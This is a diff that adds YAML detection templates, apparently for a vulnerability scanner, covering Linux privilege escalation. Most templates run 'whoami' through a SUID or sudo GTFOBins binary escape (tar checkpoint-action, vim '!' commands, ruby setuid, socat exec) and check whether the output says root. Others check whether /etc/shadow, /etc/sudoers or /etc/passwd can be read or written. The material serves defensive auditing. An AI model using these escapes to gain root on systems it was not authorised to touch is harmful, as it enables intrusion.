severity: high
reference: https://gtfobins.github.io/gtfobins/rlwrap/
metadata:
verified: true
tags: code,linux,rlwrap,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
rlwrap whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo rlwrap whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-rpm.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-rpm
info:
name: rpm - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/rpm/
metadata:
verified: true
tags: code,linux,rpm,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
rpm --pipe 'whoami 0<&1'
#SUDO
- engine:
- sh
- bash
source: |
sudo rpm --pipe 'whoami 0<&1'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-rpmdb.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-rpmdb
info:
name: rpmdb - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/rpmdb/
metadata:
verified: true
tags: code,linux,rpmdb,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
rpmdb --eval '%(whoami 1>&2)'
#SUDO
- engine:
- sh
- bash
source: |
sudo rpmdb --eval '%(whoami 1>&2)'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-rpmverify.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-rpmverify
info:
name: rpmverify - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/rpmverify/
metadata:
verified: true
tags: code,linux,rpmverify,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
rpmverify --eval '%(whoami 1>&2)'
#SUDO
- engine:
- sh
- bash
source: |
sudo rpmverify --eval '%(whoami 1>&2)'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

54
code/privilege-escalation/linux/binary/privilege-escalation-ruby.yaml Normal file
View File

@ -0,0 +1,54 @@
id: privilege-escalation-ruby
info:
name: Ruby - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/ruby/
metadata:
verified: true
tags: code,linux,ruby,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
ruby -e 'exec "whoami"'
#SUDO
- engine:
- sh
- bash
source: |
sudo ruby -e 'exec "whoami"'
#Capabilities
- engine:
- sh
- bash
source: |
ruby -e 'Process::Sys.setuid(0); exec "whoami"'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-run-parts.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-run-parts
info:
name: run-parts - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/run-parts/
metadata:
verified: true
tags: code,linux,run-parts,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
run-parts --new-session --regex 'whoami' /bin
#SUDO
- engine:
- sh
- bash
source: |
sudo run-parts --new-session --regex 'whoami' /bin
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-sash.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-sash
info:
name: sash - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/sash/
metadata:
verified: true
tags: code,linux,sash,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
sash -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo sash -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-slsh.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-slsh
info:
name: slsh - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/slsh/
metadata:
verified: true
tags: code,linux,slsh,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
slsh -e 'system("whoami")'
#SUDO
- engine:
- sh
- bash
source: |
sudo slsh -e 'system("whoami")'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-socat.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-socat
info:
name: Socat - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/socat/
metadata:
verified: true
tags: code,linux,socat,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
socat stdin exec:whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo socat stdin exec:whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-softlimit.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-softlimit
info:
name: softlimit - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/softlimit/
metadata:
verified: true
tags: code,linux,softlimit,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
softlimit whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo softlimit whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-sqlite3.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-sqlite3
info:
name: sqlite3 - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/sqlite3/
metadata:
verified: true
tags: code,linux,sqlite3,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
sqlite3 /dev/null '.shell whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo sqlite3 /dev/null '.shell whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-ssh-agent.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-ssh-agent
info:
name: ssh-agent - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/ssh-agent/
metadata:
verified: true
tags: code,linux,ssh-agent,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
ssh-agent whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo ssh-agent whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-sshpass.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-sshpass
info:
name: sshpass - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/sshpass/
metadata:
verified: true
tags: code,linux,sshpass,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
sshpass whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo sshpass whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-stdbuf.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-stdbuf
info:
name: stdbuf - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/stdbuf/
metadata:
verified: true
tags: code,linux,stdbuf,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
stdbuf -i0 whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo stdbuf -i0 whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-strace.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-strace
info:
name: strace - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/strace/
metadata:
verified: true
tags: code,linux,strace,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
strace -o /dev/null whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo strace -o /dev/null whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-tar.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-tar
info:
name: tar - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/tar/
metadata:
verified: true
tags: code,linux,tar,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-tcsh.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-tcsh
info:
name: tcsh - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/tcsh/
metadata:
verified: true
tags: code,linux,tcsh,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
tcsh -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo tcsh -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-time.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-time
info:
name: Time - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/time/
metadata:
verified: true
tags: code,linux,time,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
time whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo time whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-timeout.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-timeout
info:
name: Timeout - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/timeout/
metadata:
verified: true
tags: code,linux,timeout,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
timeout 7d whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo timeout 7d whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-tmate.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-tmate
info:
name: tmate - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/tmate/
metadata:
verified: true
tags: code,linux,tmate,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
tmate -c whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo tmate -c whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-torify.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-torify
info:
name: Torify - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/torify/
metadata:
verified: true
tags: code,linux,torify,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
torify whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo torify whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-torsocks.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-torsocks
info:
name: Torsocks - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/torsocks/
metadata:
verified: true
tags: code,linux,torsocks,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
torsocks whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo torsocks whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-unshare.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-unshare
info:
name: Unshare - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/unshare/
metadata:
verified: true
tags: code,linux,unshare,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
unshare whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo unshare whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-vi.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-vi
info:
name: Vi - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/vi/
metadata:
verified: true
tags: code,linux,vi,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
vi -c '!whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo vi -c '!whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-view.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-view
info:
name: View - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/view/
metadata:
verified: true
tags: code,linux,view,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
view -c ':!whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo view -c ':!whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-vim.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-vim
info:
name: Vim - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/vim/
metadata:
verified: true
tags: code,linux,vim,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
vim -c '!whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo vim -c '!whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-xargs.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-xargs
info:
name: Xargs - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/xargs/
metadata:
verified: true
tags: code,linux,xargs,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
xargs -a /dev/null whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo xargs -a /dev/null whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-xdg-user-dir.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-xdg-user-dir
info:
name: xdg-user-dir - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/xdg-user-dir/
metadata:
verified: true
tags: code,linux,xdg-user-dir,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
xdg-user-dir '}; whoami #'
#SUDO
- engine:
- sh
- bash
source: |
sudo xdg-user-dir '}; whoami #'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-yash.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-yash
info:
name: Yash - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/yash/
metadata:
verified: true
tags: code,linux,yash,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
yash -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo yash -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-zsh.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-zsh
info:
name: Zsh - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/zsh/
metadata:
verified: true
tags: code,linux,zsh,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
zsh -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo zsh -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

43
code/privilege-escalation/linux/readable-writable-etc-shadow.yaml Normal file
View File

@ -0,0 +1,43 @@
id: readable-writable-etc-shadow
info:
name: /etc/shadow writable or readabel - Privilege Escalation
author: daffainfo
severity: high
reference:
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow
metadata:
verified: true
tags: code,linux,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
[ -r "/etc/shadow" ] || [ -w "/etc/shadow" ] && echo "Either readable or writable" || echo "Not readable and not writable"
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: word
part: code_2_response
words:
- "Either readable or writable"
- type: word
part: code_2_response
words:
- "Not readable and not writable"
negative: true

43
code/privilege-escalation/linux/readable-writable-etc-sudoers.yaml Normal file
View File

@ -0,0 +1,43 @@
id: readable-writable-etc-sudoers
info:
name: /etc/sudoers writable or readable - Privilege Escalation
author: daffainfo
severity: high
reference:
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#etc-sudoers-etc-sudoers.d
metadata:
verified: true
tags: code,linux,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
[ -r "/etc/sudoers" ] || [ -w "/etc/sudoers" ] && echo "Either readable or writable" || echo "Not readable and not writable"
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: word
part: code_2_response
words:
- "Either readable or writable"
- type: word
part: code_2_response
words:
- "Not readable and not writable"
negative: true

26
code/privilege-escalation/linux/sudo-nopasswd.yaml Normal file
View File

@ -0,0 +1,26 @@
id: sudo-nopasswd
info:
name: Sudo NOPASSWD - Privilege Escalation
author: daffainfo
severity: high
description: Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password.
reference:
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#nopasswd
metadata:
verified: true
tags: code,linux,sudo,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
sudo -l
matchers:
- type: word
part: code_1_response
words:
- "(root) NOPASSWD:"

31
code/privilege-escalation/linux/writable-etc-passwd.yaml Normal file
View File

@ -0,0 +1,31 @@
id: writable-etc-passwd
info:
name: /etc/passwd writable - Privilege Escalation
author: daffainfo
severity: high
reference:
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-passwd
metadata:
verified: true
tags: code,linux,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
[ -w "/etc/passwd" ] && echo "Writable" || echo "Not writable"
matchers:
- type: word
part: code_1_response
words:
- "Writable"
- type: word
part: code_1_response
words:
- "Not writable"
negative: true